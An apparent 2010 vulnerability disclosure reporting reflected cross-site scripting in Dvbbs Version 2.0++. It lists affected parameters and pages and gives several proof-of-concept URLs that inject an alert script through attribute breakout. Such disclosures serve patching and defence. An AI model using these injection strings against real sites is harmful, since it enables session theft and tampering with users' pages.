Lots XSS of Dvbbs Version 2.0++

> Dvbbs Version 2.0++ is the latest version of dvbbs. it has lots of xss. > The Parameters:boardid、action、location、TopicDate、TopicOrder、TopicDA、orders、oper > The pages:index.php、infolist.php、forum_savvy.php、boardpermission.php、admin_boardset.php、topicother.php、boardhelp.php、accesstopic.php、indivgroup_list.php、admin_batch.php、query.php > > The parameters in the pages has xss! > > FOR example: > http://www.example.com:80/index.php?boardid="/><script>alert(/Liscker/)</script> > http://www.example.com:80/index.php?action="/><script>alert(/Liscker/)</script> > http://www.example.com:80/index.php?location="/><script>alert(/Liscker/)</script> > http://www.example.com:80/index.php?TopicDate="/><script>alert(/Liscker/)</script> > http://www.example.com:80/index.php?TopicOrder="/><script>alert(/Liscker/)</script> > http://www.example.com:80/index.php?TopicDA=<script>alert(/Liscker/)</script> > http://www.example.com:80/infolist.php?boardid="/><script>alert(/Liscker/)</script> > > > > > Liscker > 2010.5.13